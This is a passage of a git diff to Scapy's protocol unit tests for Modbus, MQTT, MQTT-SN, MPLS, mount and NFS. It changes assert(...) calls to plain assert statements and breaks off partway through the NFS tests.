ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x91\x01') -assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdError)) +assert isinstance(p.payload, ModbusPDU11ReportSlaveIdError) = MBAP Guess Payload ModbusPDU14ReadFileRecordRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x03\xff\x14\x00') -assert(isinstance(p.payload, ModbusPDU14ReadFileRecordRequest)) +assert isinstance(p.payload, ModbusPDU14ReadFileRecordRequest) = MBAP Guess Payload ModbusPDU14ReadFileRecordResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x14\x00') -assert(isinstance(p.payload, ModbusPDU14ReadFileRecordResponse)) +assert isinstance(p.payload, ModbusPDU14ReadFileRecordResponse) = MBAP Guess Payload ModbusPDU14ReadFileRecordError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x91\x01') -assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdError)) +assert isinstance(p.payload, ModbusPDU11ReportSlaveIdError) = MBAP Guess Payload ModbusPDU15WriteFileRecordRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x03\xff\x15\x00') -assert(isinstance(p.payload, ModbusPDU15WriteFileRecordRequest)) +assert isinstance(p.payload, ModbusPDU15WriteFileRecordRequest) = MBAP Guess Payload ModbusPDU15WriteFileRecordResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x15\x00') -assert(isinstance(p.payload, ModbusPDU15WriteFileRecordResponse)) +assert isinstance(p.payload, ModbusPDU15WriteFileRecordResponse) = MBAP Guess Payload ModbusPDU15WriteFileRecordError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x95\x01') -assert(isinstance(p.payload, ModbusPDU15WriteFileRecordError)) +assert isinstance(p.payload, ModbusPDU15WriteFileRecordError) = MBAP Guess Payload ModbusPDU16MaskWriteRegisterRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') -assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterRequest)) +assert isinstance(p.payload, ModbusPDU16MaskWriteRegisterRequest) = MBAP Guess Payload ModbusPDU16MaskWriteRegisterResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') -assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterResponse)) +assert isinstance(p.payload, ModbusPDU16MaskWriteRegisterResponse) = MBAP Guess Payload ModbusPDU16MaskWriteRegisterError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x96\x01') -assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterError)) +assert isinstance(p.payload, ModbusPDU16MaskWriteRegisterError) = MBAP Guess Payload ModbusPDU16MaskWriteRegisterRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') -assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterRequest)) +assert isinstance(p.payload, ModbusPDU16MaskWriteRegisterRequest) = MBAP Guess Payload ModbusPDU16MaskWriteRegisterResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x08\xff\x16\x00\x00\xff\xff\x00\x00') -assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterResponse)) +assert isinstance(p.payload, ModbusPDU16MaskWriteRegisterResponse) = MBAP Guess Payload ModbusPDU16MaskWriteRegisterError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x96\x01') -assert(isinstance(p.payload, ModbusPDU16MaskWriteRegisterError)) +assert isinstance(p.payload, ModbusPDU16MaskWriteRegisterError) = MBAP Guess Payload ModbusPDU17ReadWriteMultipleRegistersRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\r\xff\x17\x00\x00\x00\x01\x00\x00\x00\x01\x02\x00\x00') -assert(isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersRequest)) +assert isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersRequest) = MBAP Guess Payload ModbusPDU17ReadWriteMultipleRegistersResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x05\xff\x17\x02\x00\x00') -assert(isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersResponse)) +assert isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersResponse) = MBAP Guess Payload ModbusPDU17ReadWriteMultipleRegistersError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x97\x01') -assert(isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersError)) +assert isinstance(p.payload, ModbusPDU17ReadWriteMultipleRegistersError) = MBAP Guess Payload ModbusPDU18ReadFIFOQueueRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x04\xff\x18\x00\x00') -assert(isinstance(p.payload, ModbusPDU18ReadFIFOQueueRequest)) +assert isinstance(p.payload, ModbusPDU18ReadFIFOQueueRequest) = MBAP Guess Payload ModbusPDU18ReadFIFOQueueResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x18\x00\x02\x00\x00') -assert(isinstance(p.payload, ModbusPDU18ReadFIFOQueueResponse)) +assert isinstance(p.payload, ModbusPDU18ReadFIFOQueueResponse) = MBAP Guess Payload ModbusPDU18ReadFIFOQueueError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x98\x01') -assert(isinstance(p.payload, ModbusPDU18ReadFIFOQueueError)) +assert isinstance(p.payload, ModbusPDU18ReadFIFOQueueError) = MBAP Guess Payload ModbusPDU2B0EReadDeviceIdentificationRequest (2 level test) p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x04\xff+\x0e\x01\x00') -assert(isinstance(p.payload, ModbusPDU2B0EReadDeviceIdentificationRequest)) +assert isinstance(p.payload, ModbusPDU2B0EReadDeviceIdentificationRequest) = MBAP Guess Payload ModbusPDU2B0EReadDeviceIdentificationResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x1b\xff+\x0e\x01\x83\x00\x00\x03\x00\x08Pymodbus\x01\x02PM\x02\x031.0') -assert(isinstance(p.payload, ModbusPDU2B0EReadDeviceIdentificationResponse)) +assert isinstance(p.payload, ModbusPDU2B0EReadDeviceIdentificationResponse) = MBAP Guess Payload ModbusPDU2B0EReadDeviceIdentificationError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\xab\x01') -assert(isinstance(p.payload, ModbusPDU2B0EReadDeviceIdentificationError)) +assert isinstance(p.payload, ModbusPDU2B0EReadDeviceIdentificationError) = MBAP Guess Payload Reserved Function Request (Invalid payload) p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x5b') -assert(isinstance(p.payload,ModbusPDUReservedFunctionCodeRequest)) +assert isinstance(p.payload,ModbusPDUReservedFunctionCodeRequest) = MBAP Guess Payload Reserved Function Response (Invalid payload) p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x02\xff\x7e') -assert(isinstance(p.payload, ModbusPDUReservedFunctionCodeResponse)) +assert isinstance(p.payload, ModbusPDUReservedFunctionCodeResponse) = MBAP Guess Payload Reserved Function Error (Invalid payload) p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x02\xff\x8a') -assert(isinstance(p.payload, ModbusPDUReservedFunctionCodeError)) +assert isinstance(p.payload, ModbusPDUReservedFunctionCodeError) = MBAP Guess Payload ModbusPDU02ReadDiscreteInputsResponse assert raw(ModbusPDU02ReadDiscreteInputsResponse()) == b'\x02\x01\x00' @@ -260,8 +260,8 @@ raw(ModbusPDU01ReadCoilsRequest()) == b'\x01\x00\x00\x00\x01' raw(ModbusPDU01ReadCoilsRequest(startAddr=16, quantity=2)) == b'\x01\x00\x10\x00\x02' = ModbusPDU01ReadCoilsRequest dissection p = ModbusPDU01ReadCoilsRequest(b'\x01\x00\x10\x00\x02') -assert(p.startAddr == 16) -assert(p.quantity == 2) +assert p.startAddr == 16 +assert p.quantity == 2 = ModbusPDU01ReadCoilsResponse raw(ModbusPDU01ReadCoilsResponse()) == b'\x01\x01\x00' @@ -269,8 +269,8 @@ raw(ModbusPDU01ReadCoilsResponse()) == b'\x01\x01\x00' raw(ModbusPDU01ReadCoilsResponse(coilStatus=[0x10]*3)) == b'\x01\x03\x10\x10\x10' = ModbusPDU01ReadCoilsResponse dissection p = ModbusPDU01ReadCoilsResponse(b'\x01\x03\x10\x10\x10') -assert(p.coilStatus == [16, 16, 16]) -assert(p.byteCount == 3) +assert p.coilStatus == [16, 16, 16] +assert p.byteCount == 3 = ModbusPDU01ReadCoilsError raw(ModbusPDU01ReadCoilsError()) == b'\x81\x01' @@ -278,8 +278,8 @@ raw(ModbusPDU01ReadCoilsError()) == b'\x81\x01' raw(ModbusPDU01ReadCoilsError(exceptCode=2)) == b'\x81\x02' = ModbusPDU81ReadCoilsError dissection p = ModbusPDU01ReadCoilsError(b'\x81\x02') -assert(p.funcCode == 0x81) -assert(p.exceptCode == 2) +assert p.funcCode == 0x81 +assert p.exceptCode == 2 # 0x02/0x82 Read Discrete Inputs Registers ------------------------------------------ = ModbusPDU02ReadDiscreteInputsRequest @@ -293,8 +293,8 @@ raw(ModbusPDU02ReadDiscreteInputsResponse()) == b'\x02\x01\x00' raw(ModbusPDU02ReadDiscreteInputsResponse(inputStatus=[0x02, 0x01])) == b'\x02\x02\x02\x01' = ModbusPDU02ReadDiscreteInputsRequest dissection p = ModbusPDU02ReadDiscreteInputsResponse(b'\x02\x02\x02\x01') -assert(p.byteCount == 2) -assert(p.inputStatus == [0x02, 0x01]) +assert p.byteCount == 2 +assert p.inputStatus == [0x02, 0x01] = ModbusPDU02ReadDiscreteInputsError raw(ModbusPDU02ReadDiscreteInputsError()) == b'\x82\x01' @@ -311,8 +311,8 @@ raw(ModbusPDU03ReadHoldingRegistersResponse()) == b'\x03\x02\x00\x00' 1==1 = ModbusPDU03ReadHoldingRegistersResponse dissection p = ModbusPDU03ReadHoldingRegistersResponse(b'\x03\x06\x02+\x00\x00\x00d') -assert(p.byteCount == 6) -assert(p.registerVal == [555, 0, 100]) +assert p.byteCount == 6 +assert p.registerVal == [555, 0, 100] = ModbusPDU03ReadHoldingRegistersError raw(ModbusPDU03ReadHoldingRegistersError()) == b'\x83\x01' @@ -430,21 +430,21 @@ raw(ModbusPDU11ReportSlaveIdError()) == b'\x91\x01' # 0x14/944 Read File Record --------------------------------------------------------- = ModbusPDU14ReadFileRecordRequest len parameters p = raw(ModbusPDU14ReadFileRecordRequest()/ModbusReadFileSubRequest()/ModbusReadFileSubRequest()) -assert(p == b'\x14\x0e\x06\x00\x01\x00\x00\x00\x01\x06\x00\x01\x00\x00\x00\x01') +assert p == b'\x14\x0e\x06\x00\x01\x00\x00\x00\x01\x06\x00\x01\x00\x00\x00\x01' = ModbusPDU14ReadFileRecordRequest minimal parameters p = raw(ModbusPDU14ReadFileRecordRequest()/ModbusReadFileSubRequest(fileNumber=4, recordNumber=1, recordLength=2)/ModbusReadFileSubRequest(fileNumber=3, recordNumber=9, recordLength=2)) -assert(p == b'\x14\x0e\x06\x00\x04\x00\x01\x00\x02\x06\x00\x03\x00\t\x00\x02') +assert p == b'\x14\x0e\x06\x00\x04\x00\x01\x00\x02\x06\x00\x03\x00\t\x00\x02' = ModbusPDU14ReadFileRecordRequest dissection p = ModbusPDU14ReadFileRecordRequest(b'\x14\x0e\x06\x00\x04\x00\x01\x00\x02\x06\x00\x03\x00\t\x00\x02') -assert(isinstance(p.payload, ModbusReadFileSubRequest)) -assert(isinstance(p.payload.payload, ModbusReadFileSubRequest)) +assert isinstance(p.payload, ModbusReadFileSubRequest) +assert isinstance(p.payload.payload, ModbusReadFileSubRequest) = ModbusPDU14ReadFileRecordResponse minimal parameters raw(ModbusPDU14ReadFileRecordResponse()/ModbusReadFileSubResponse(recData=[0x0dfe, 0x0020])/ModbusReadFileSubResponse(recData=[0x33cd, 0x0040])) == b'\x14\x0c\x05\x06\r\xfe\x00 \x05\x063\xcd\x00@' = ModbusPDU14ReadFileRecordResponse dissection p = ModbusPDU14ReadFileRecordResponse(b'\x14\x0c\x05\x06\r\xfe\x00 \x05\x063\xcd\x00@') -assert(isinstance(p.payload, ModbusReadFileSubResponse)) -assert(isinstance(p.payload.payload, ModbusReadFileSubResponse)) +assert isinstance(p.payload, ModbusReadFileSubResponse) +assert isinstance(p.payload.payload, ModbusReadFileSubResponse) = ModbusPDU14ReadFileRecordError raw(ModbusPDU14ReadFileRecordError()) == b'\x94\x01' @@ -454,15 +454,15 @@ raw(ModbusPDU14ReadFileRecordError()) == b'\x94\x01' raw(ModbusPDU15WriteFileRecordRequest()/ModbusWriteFileSubRequest(fileNumber=4, recordNumber=7, recordData=[0x06af, 0x04be, 0x100d])) == b'\x15\r\x06\x00\x04\x00\x07\x00\x03\x06\xaf\x04\xbe\x10\r' = ModbusPDU15WriteFileRecordRequest dissection p = ModbusPDU15WriteFileRecordRequest(b'\x15\x0d\x06\x00\x04\x00\x07\x00\x03\x06\xaf\x04\xbe\x10\r') -assert(isinstance(p.payload, ModbusWriteFileSubRequest)) -assert(p.payload.recordLength == 3) +assert isinstance(p.payload, ModbusWriteFileSubRequest) +assert p.payload.recordLength == 3 = ModbusPDU15WriteFileRecordResponse minimal parameters raw(ModbusPDU15WriteFileRecordResponse()/ModbusWriteFileSubResponse(fileNumber=4, recordNumber=7, recordData=[0x06af, 0x04be, 0x100d])) == b'\x15\r\x06\x00\x04\x00\x07\x00\x03\x06\xaf\x04\xbe\x10\r' = ModbusPDU15WriteFileRecordResponse dissection p = ModbusPDU15WriteFileRecordResponse(b'\x15\x0d\x06\x00\x04\x00\x07\x00\x03\x06\xaf\x04\xbe\x10\r') -assert(isinstance(p.payload, ModbusWriteFileSubResponse)) -assert(p.payload.recordLength == 3) +assert isinstance(p.payload, ModbusWriteFileSubResponse) +assert p.payload.recordLength == 3 = ModbusPDU15WriteFileRecordError raw(ModbusPDU15WriteFileRecordError()) == b'\x95\x01' @@ -484,8 +484,8 @@ raw(ModbusPDU17ReadWriteMultipleRegistersRequest()) == b'\x17\x00\x00\x00\x01\x0 raw(ModbusPDU17ReadWriteMultipleRegistersRequest(writeRegistersValue=[0x0001, 0x0002])) == b'\x17\x00\x00\x00\x01\x00\x00\x00\x02\x04\x00\x01\x00\x02' = ModbusPDU17ReadWriteMultipleRegistersRequest dissection p = ModbusPDU17ReadWriteMultipleRegistersRequest(b'\x17\x00\x00\x00\x01\x00\x00\x00\x02\x04\x00\x01\x00\x02') -assert(p.byteCount == 4) -assert(p.writeQuantityRegisters == 2) +assert p.byteCount == 4 +assert p.writeQuantityRegisters == 2 = ModbusPDU17ReadWriteMultipleRegistersResponse raw(ModbusPDU17ReadWriteMultipleRegistersResponse()) == b'\x17\x02\x00\x00' @@ -508,8 +508,8 @@ raw(ModbusPDU18ReadFIFOQueueResponse()) == b'\x18\x00\x02\x00\x00' raw(ModbusPDU18ReadFIFOQueueResponse(FIFOVal=[0x0001, 0x0002, 0x0003])) == b'\x18\x00\x08\x00\x03\x00\x01\x00\x02\x00\x03' = ModbusPDU18ReadFIFOQueueResponse dissection p = ModbusPDU18ReadFIFOQueueResponse(b'\x18\x00\x08\x00\x03\x00\x01\x00\x02\x00\x03') -assert(p.byteCount == 8) -assert(p.FIFOCount == 3) +assert p.byteCount == 8 +assert p.FIFOCount == 3 = ModbusPDU18ReadFIFOQueueError raw(ModbusPDU18ReadFIFOQueueError()) == b'\x98\x01' @@ -525,12 +525,12 @@ raw(ModbusPDU2B0EReadDeviceIdentificationRequest()) == b'+\x0e\x01\x00' raw(ModbusPDU2B0EReadDeviceIdentificationResponse()) == b'+\x0e\x04\x01\x00\x00\x00' = ModbusPDU2B0EReadDeviceIdentificationResponse complete response p = raw(ModbusPDU2B0EReadDeviceIdentificationResponse(objCount=2)/ModbusObjectId(id=0, value="Obj1")/ModbusObjectId(id=1, value="Obj2")) -assert(p == b'+\x0e\x04\x01\x00\x00\x02\x00\x04Obj1\x01\x04Obj2') +assert p == b'+\x0e\x04\x01\x00\x00\x02\x00\x04Obj1\x01\x04Obj2' = ModbusPDU2B0EReadDeviceIdentificationResponse dissection p = ModbusPDU2B0EReadDeviceIdentificationResponse(b'+\x0e\x01\x83\x00\x00\x03\x00\x08Pymodbus\x01\x02PM\x02\x031.0') -assert(p.payload.payload.payload.id == 2) -assert(p.payload.payload.id == 1) -assert(p.payload.id == 0) +assert p.payload.payload.payload.id == 2 +assert p.payload.payload.id == 1 +assert p.payload.id == 0 = ModbusPDU2B0EReadDeviceIdentificationError raw(ModbusPDU2B0EReadDeviceIdentificationError()) == b'\xab\x01' diff --git a/test/contrib/mount.uts b/test/contrib/mount.uts index d363aff7f07..ea08f4db342 100644 --- a/test/contrib/mount.uts +++ b/test/contrib/mount.uts @@ -24,20 +24,20 @@ MOUNT_Reply(status=1) = Layer Bindings for Mount Calls from scapy.contrib.oncrpc import * pkt = RPC()/RPC_Call()/NULL_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100005, 3, 0)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100005, 3, 0) pkt = RPC()/RPC_Call()/MOUNT_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100005, 3, 1)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100005, 3, 1) pkt = RPC()/RPC_Call()/UNMOUNT_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100005, 3, 3)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100005, 3, 3) = Layer Bindings for Mount Replies from scapy.contrib.oncrpc import * pkt = RPC()/RPC_Reply()/NULL_Reply() -assert(pkt.mtype == 1) +assert pkt.mtype == 1 pkt = RPC()/RPC_Reply()/MOUNT_Reply() -assert(pkt.mtype == 1) +assert pkt.mtype == 1 pkt = RPC()/RPC_Reply()/UNMOUNT_Reply() -assert(pkt.mtype == 1) +assert pkt.mtype == 1 + Test Built Packets vs Raw Strings diff --git a/test/contrib/mpls.uts b/test/contrib/mpls.uts index 1ab695504b7..06d2d56d0fb 100644 --- a/test/contrib/mpls.uts +++ b/test/contrib/mpls.uts @@ -8,18 +8,18 @@ = Build & dissect - IPv4 s = raw(Ether(src="00:01:02:04:05")/MPLS()/IP()) -assert(s == b'\xff\xff\xff\xff\xff\xff\x00\x01\x02\x04\x05\x00\x88G\x00\x00\x01\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01') +assert s == b'\xff\xff\xff\xff\xff\xff\x00\x01\x02\x04\x05\x00\x88G\x00\x00\x01\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01' p = Ether(s) -assert(MPLS in p and IP in p) +assert MPLS in p and IP in p = Build & dissect - IPv6 s = raw(Ether(src="00:01:02:04:05")/MPLS(s=0)/MPLS()/IPv6()) -assert(s == b'\xff\xff\xff\xff\xff\xff\x00\x01\x02\x04\x05\x00\x88G\x00\x000\x00\x00\x00!\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert s == b'\xff\xff\xff\xff\xff\xff\x00\x01\x02\x04\x05\x00\x88G\x00\x000\x00\x00\x00!\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' p = Ether(s) -assert(IPv6 in p and isinstance(p[MPLS].payload, MPLS)) +assert IPv6 in p and isinstance(p[MPLS].payload, MPLS) = Association on IP and IPv6 p = IP()/MPLS() diff --git a/test/contrib/mqtt.uts b/test/contrib/mqtt.uts index c9a9c7c6eb0..a255b9e3aeb 100644 --- a/test/contrib/mqtt.uts +++ b/test/contrib/mqtt.uts @@ -13,23 +13,23 @@ from scapy.contrib.mqtt import * = MQTTPublish, packet instantiation p = MQTT()/MQTTPublish(topic='test1',value='test2') -assert(p.type == 3) -assert(p.topic == b'test1') -assert(p.value == b'test2') -assert(p.len == None) -assert(p.length == None) +assert p.type == 3 +assert p.topic == b'test1' +assert p.value == b'test2' +assert p.len == None +assert p.length == None = Fixed header and MQTTPublish, packet dissection s = b'0\n\x00\x04testtest' publish = MQTT(s) -assert(publish.type == 3) -assert(publish.QOS == 0) -assert(publish.DUP == 0) -assert(publish.RETAIN == 0) -assert(publish.len == 10) -assert(publish[MQTTPublish].length == 4) -assert(publish[MQTTPublish].topic == b'test') -assert(publish[MQTTPublish].value == b'test') +assert publish.type == 3 +assert publish.QOS == 0 +assert publish.DUP == 0 +assert publish.RETAIN == 0 +assert publish.len == 10 +assert publish[MQTTPublish].length == 4 +assert publish[MQTTPublish].topic == b'test' +assert publish[MQTTPublish].value == b'test' = MQTTPublish @@ -55,26 +55,26 @@ assert p[1].msgid == 1234 = MQTTConnect, packet instantiation c = MQTT()/MQTTConnect(clientIdlen=5, clientId='newid') -assert(c.type == 1) -assert(c.clientId == b'newid') -assert(c.clientIdlen == 5) +assert c.type == 1 +assert c.clientId == b'newid' +assert c.clientIdlen == 5 = MQTTConnect, packet dissection s = b'\x10\x1f\x00\x06MQIsdp\x03\x02\x00<\x00\x11mosqpub/1440-kali' connect = MQTT(s) -assert(connect.length == 6) -assert(connect.protoname == b'MQIsdp') -assert(connect.protolevel == 3) -assert(connect.usernameflag == 0) -assert(connect.passwordflag == 0) -assert(connect.willretainflag == 0) -assert(connect.willQOSflag == 0) -assert(connect.willflag == 0) -assert(connect.cleansess == 1) -assert(connect.reserved == 0) -assert(connect.klive == 60) -assert(connect.clientIdlen == 17) -assert(connect.clientId == b'mosqpub/1440-kali') +assert connect.length == 6 +assert connect.protoname == b'MQIsdp' +assert connect.protolevel == 3 +assert connect.usernameflag == 0 +assert connect.passwordflag == 0 +assert connect.willretainflag == 0 +assert connect.willQOSflag == 0 +assert connect.willflag == 0 +assert connect.cleansess == 1 +assert connect.reserved == 0 +assert connect.klive == 60 +assert connect.clientIdlen == 17 +assert connect.clientId == b'mosqpub/1440-kali' = MQTTDisconnect mr = raw(MQTT()/MQTTDisconnect()) @@ -83,97 +83,97 @@ assert dc.type == 14 =MQTTConnack, packet instantiation ck = MQTT()/MQTTConnack(sessPresentFlag=1,retcode=0) -assert(ck.type == 2) -assert(ck.sessPresentFlag == 1) -assert(ck.retcode == 0) +assert ck.type == 2 +assert ck.sessPresentFlag == 1 +assert ck.retcode == 0 = MQTTConnack, packet dissection s = b' \x02\x00\x00' connack = MQTT(s) -assert(connack.sessPresentFlag == 0) -assert(connack.retcode == 0) +assert connack.sessPresentFlag == 0 +assert connack.retcode == 0 = MQTTSubscribe, packet instantiation sb = MQTT()/MQTTSubscribe(msgid=1, topics=[MQTTTopicQOS(topic='newtopic', QOS=1, length=0)]) -assert(sb.type == 8) -assert(sb.msgid == 1) -assert(sb.topics[0].topic == b'newtopic') -assert(sb.topics[0].length == 0) -assert(sb[MQTTSubscribe][MQTTTopicQOS].QOS == 1) +assert sb.type == 8 +assert sb.msgid == 1 +assert sb.topics[0].topic == b'newtopic' +assert sb.topics[0].length == 0 +assert sb[MQTTSubscribe][MQTTTopicQOS].QOS == 1 = MQTTSubscribe, packet dissection s = b'\x82\t\x00\x01\x00\x04test\x01' subscribe = MQTT(s) -assert(subscribe.msgid == 1) -assert(subscribe.topics[0].length == 4) -assert(subscribe.topics[0].topic == b'test') -assert(subscribe.topics[0].QOS == 1) +assert subscribe.msgid == 1 +assert subscribe.topics[0].length == 4 +assert subscribe.topics[0].topic == b'test' +assert subscribe.topics[0].QOS == 1 = MQTTSuback, packet instantiation sk = MQTT()/MQTTSuback(msgid=1, retcode=0) -assert(sk.type == 9) -assert(sk.msgid == 1) -assert(sk.retcode == 0) +assert sk.type == 9 +assert sk.msgid == 1 +assert sk.retcode == 0 = MQTTSuback, packet dissection s = b'\x90\x03\x00\x01\x00' suback = MQTT(s) -assert(suback.msgid == 1) -assert(suback.retcode == 0) +assert suback.msgid == 1 +assert suback.retcode == 0 = MQTTUnsubscribe, packet instantiation unsb = MQTT()/MQTTUnsubscribe(msgid=1, topics=[MQTTTopic(topic='newtopic',length=0)]) -assert(unsb.type == 10) -assert(unsb.msgid == 1) -assert(unsb.topics[0].topic == b'newtopic') -assert(unsb.topics[0].length == 0) +assert unsb.type == 10 +assert unsb.msgid == 1 +assert unsb.topics[0].topic == b'newtopic' +assert unsb.topics[0].length == 0 = MQTTUnsubscribe, packet dissection u = b'\xA2\x09\x00\x01\x00\x03\x61\x2F\x62' unsubscribe = MQTT(u) -assert(unsubscribe.msgid == 1) -assert(unsubscribe.topics[0].length == 3) -assert(unsubscribe.topics[0].topic == b'a/b') +assert unsubscribe.msgid == 1 +assert unsubscribe.topics[0].length == 3 +assert unsubscribe.topics[0].topic == b'a/b' = MQTTUnsuback, packet instantiation unsk = MQTT()/MQTTUnsuback(msgid=1) -assert(unsk.type == 11) -assert(unsk.msgid == 1) +assert unsk.type == 11 +assert unsk.msgid == 1 = MQTTUnsuback, packet dissection u = b'\xb0\x02\x00\x01' unsuback = MQTT(u) -assert(unsuback.type == 11) -assert(unsuback.msgid == 1) +assert unsuback.type == 11 +assert unsuback.msgid == 1 = MQTTPubrec, packet instantiation pc = MQTT()/MQTTPubrec(msgid=1) -assert(pc.type == 5) -assert(pc.msgid == 1) +assert pc.type == 5 +assert pc.msgid == 1 = MQTTPubrec packet dissection s = b'P\x02\x00\x01' pubrec = MQTT(s) -assert(pubrec.msgid == 1) +assert pubrec.msgid == 1 = MQTTPublish, long value p = MQTT()/MQTTPublish(topic='test1',value='a'*200) -assert(bytes(p)) -assert(p.type == 3) -assert(p.topic == b'test1') -assert(p.value == b'a'*200) -assert(p.len == None) -assert(p.length == None) +assert bytes(p) +assert p.type == 3 +assert p.topic == b'test1' +assert p.value == b'a'*200 +assert p.len == None +assert p.length == None = MQTT without payload p = MQTT() -assert(bytes(p) == b'\x10\x00') +assert bytes(p) == b'\x10\x00' = MQTT RandVariableFieldLen -assert(type(MQTT().fieldtype['len'].randval()) == RandVariableFieldLen) -assert(type(MQTT().fieldtype['len'].randval() + 0) == int) +assert type(MQTT().fieldtype['len'].randval()) == RandVariableFieldLen +assert type(MQTT().fieldtype['len'].randval() + 0) == int = MQTTUnsubscribe u = MQTT(b'\xA2\x0C\x00\x01\x00\x03\x61\x2F\x62\x00\x03\x63\x2F\x64') diff --git a/test/contrib/mqttsn.uts b/test/contrib/mqttsn.uts index f0e34ce928d..564e4ff6a1a 100644 --- a/test/contrib/mqttsn.uts +++ b/test/contrib/mqttsn.uts @@ -757,41 +757,41 @@ assert p.payload.payload.data == 1115 * b"X" = MQTTSN without payload p = MQTTSN() -assert(bytes(p) == b"\x02\x00") +assert bytes(p) == b"\x02\x00" = MQTTSN without payload -- invalid lengths p = MQTTSN(len=1) try: bytes(p) # expect Scapy_Exception - assert(false) + assert false except Scapy_Exception: pass p = MQTTSN(len=0x10000) try: bytes(p) # expect Scapy_Exception - assert(false) + assert false except Scapy_Exception: pass b = '\x01' try: p = MQTTSN(b) # expect Scapy_Exception - assert(false) + assert false except Scapy_Exception: pass b = '\x01\x02' try: p = MQTTSN(b) # expect Scapy_Exception - assert(false) + assert false except Scapy_Exception: pass = MQTT-SN RandVariableFieldLen -assert(type(MQTTSN().fieldtype["len"].randval()) == RandVariableFieldLen) -assert(type(MQTTSN().fieldtype["len"].randval() + 0) == int) +assert type(MQTTSN().fieldtype["len"].randval()) == RandVariableFieldLen +assert type(MQTTSN().fieldtype["len"].randval() + 0) == int = Disect full IPv6 packages ~ dport == 1883 (0x75b) diff --git a/test/contrib/nfs.uts b/test/contrib/nfs.uts index 535eb05f046..fd981929f23 100644 --- a/test/contrib/nfs.uts +++ b/test/contrib/nfs.uts @@ -85,92 +85,92 @@ COMMIT_Reply(status=1) = Layer Bindings for NFS Calls from scapy.contrib.oncrpc import * pkt = RPC()/RPC_Call()/NULL_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 0)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 0) pkt = RPC()/RPC_Call()/GETATTR_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 1)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 1) pkt = RPC()/RPC_Call()/SETATTR_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 2)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 2) pkt = RPC()/RPC_Call()/LOOKUP_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 3)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 3) pkt = RPC()/RPC_Call()/ACCESS_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 4)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 4) pkt = RPC()/RPC_Call()/READLINK_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 5)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 5) pkt = 